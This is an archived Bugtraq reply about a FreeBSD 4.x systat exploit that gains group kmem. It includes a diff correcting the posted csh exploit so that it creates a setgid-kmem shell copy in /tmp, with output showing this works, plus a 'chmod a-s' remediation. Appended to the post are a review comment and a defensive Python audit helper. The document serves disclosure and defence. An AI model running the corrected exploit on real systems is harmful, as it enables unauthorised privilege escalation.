Bugtraq mailing list archives

Re: FreeBSD 4.x systat exploit


From: Steve Reid <sreid () SEA-TO-SKY NET>
Date: Tue, 10 Oct 2000 18:28:44 -0700

On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
#!/bin/csh

# (c) 2000 Przemysław Frasunek <venglin () freebsd lublin pl>
#
# FreeBSD 4.x systat gid=kmem exploit
# Idea by: Jouko Pynnönen <jouko () SOLUTIONS FI>
#
# Dedicated to ksm.
[etc]

It doesn't work as posted. But that doesn't mean systat is safe; it
just means you aren't "venglin":

--- exploit.csh.orig    Tue Oct 10 17:42:49 2000
+++ exploit.csh Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
 #!/bin/csh

 cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
 chmod 2755 /tmp/csh
 __EOF__
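Review bot: the replacement line `chgrp kmem /tmp/csh` still hardcodes the /tmp/csh path and leaves the following `chmod 2755` (setgid) context line untouched, so the on-disk artifact a defender can look for is identical before and after this patch: a copy of /bin/csh in /tmp with group kmem and the setgid bit set, which is exactly what the `ls` line below the diff shows (`-rwxr-sr-x 1 steve kmem ... /tmp/csh`). The only thing the hunk changes is the dependency on a fixed username, which the text above identifies as the reason the posted version failed.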

And now it works:
steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x  1 steve  kmem  622908 Oct 10 18:15 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386

BTW, /usr/bin/top is also linked to ncurses. I don't know if it's
vulnerable or not (the exploit does nothing to top in my limited
testing) but it might be prudent to remove the setgid bit from it too.

chmod a-s /usr/bin/systat /usr/bin/top
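Added example, not part of the original post: a small audit helper in the spirit of the `chmod a-s` remediation above. It flags setgid-to-kmem entries in a captured `ls -l` listing (the evidence format the post shows), checks a live path with `os.lstat`, and strips the set-id bits the way `chmod a-s` does. The group name `kmem` and the sample listing lines other than the one copied from the post are constructed for the demo.

```python
"""Audit helper for setgid binaries in the kmem group (added example,
not code from the original post or from FreeBSD).

Assumptions: group "kmem" is the group of interest; the SAMPLE_LS lines
marked "constructed" are made up for the demo."""
import os
import stat
import grp
import tempfile

TARGET_GROUP = "kmem"   # assumption: the group whose setgid binaries we audit


def parse_ls_line(line):
    """Split one `ls -l` line into (mode_string, owner, group, path).

    Returns None for lines that are not long-listing entries (e.g. "total 12").
    The path is the 9th whitespace-separated field, so names with spaces survive."""
    fields = line.split(None, 8)
    if len(fields) < 9 or len(fields[0]) != 10:
        return None
    mode, owner, group, path = fields[0], fields[2], fields[3], fields[8]
    return mode, owner, group, path


def mode_string_is_setgid(mode):
    """Column 6 of the mode string is the group-execute slot; 's' or 'S' there
    means S_ISGID is set ('S' = setgid without group execute)."""
    return mode[6] in "sS"


def flag_setgid_group(ls_lines, group=TARGET_GROUP):
    """Return the paths in a captured `ls -l` listing that are setgid to `group`."""
    hits = []
    for line in ls_lines:
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, _owner, grp_name, path = parsed
        if grp_name == group and mode_string_is_setgid(mode):
            hits.append(path)
    return hits


def live_setgid_group(path):
    """Group name of a setgid file on the running system, or None if not setgid."""
    st = os.lstat(path)
    if not st.st_mode & stat.S_ISGID:
        return None
    try:
        return grp.getgrgid(st.st_gid).gr_name
    except KeyError:
        return str(st.st_gid)


def strip_setid_bits(path):
    """Equivalent of `chmod a-s path`: clear both setuid and setgid.
    Returns the resulting permission bits."""
    st = os.lstat(path)
    os.chmod(path, stat.S_IMODE(st.st_mode) & ~(stat.S_ISUID | stat.S_ISGID))
    return stat.S_IMODE(os.lstat(path).st_mode)


# Constructed sample listing; the /tmp/csh line is copied from the post above.
SAMPLE_LS = [
    "total 12",
    "-rwxr-sr-x  1 steve  kmem  622908 Oct 10 18:15 /tmp/csh",             # from the post
    "-r-xr-sr-x  1 root   kmem   43212 Jul 28 12:00 /usr/bin/systat",      # constructed
    "-r-xr-sr-x  1 root   wheel  51204 Jul 28 12:00 /usr/bin/top",         # constructed, other group
    "-r-xr-xr-x  1 root   kmem   10240 Jul 28 12:00 /usr/bin/not-setgid",  # constructed, no setgid
    "-r-xr-S---  1 root   kmem   10240 Jul 28 12:00 /usr/bin/setgid-noexec",  # constructed, 'S' form
]


def demo_live_roundtrip():
    """Create a temp file with mode 2755, confirm setgid, strip it.
    Returns (setgid_before, setgid_after, final_mode)."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        path = f.name
    try:
        os.chmod(path, 0o2755)
        before = bool(os.lstat(path).st_mode & stat.S_ISGID)
        final_mode = strip_setid_bits(path)
        return before, bool(final_mode & stat.S_ISGID), final_mode
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("setgid to kmem in sample listing:", flag_setgid_group(SAMPLE_LS))
    print("live roundtrip (before, after, mode):", demo_live_roundtrip())
```

Run against real output with `ls -l /usr/bin /usr/sbin` piped into `flag_setgid_group`; `strip_setid_bits` is the programmatic form of the `chmod a-s` line above and needs ownership of (or root over) the target.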

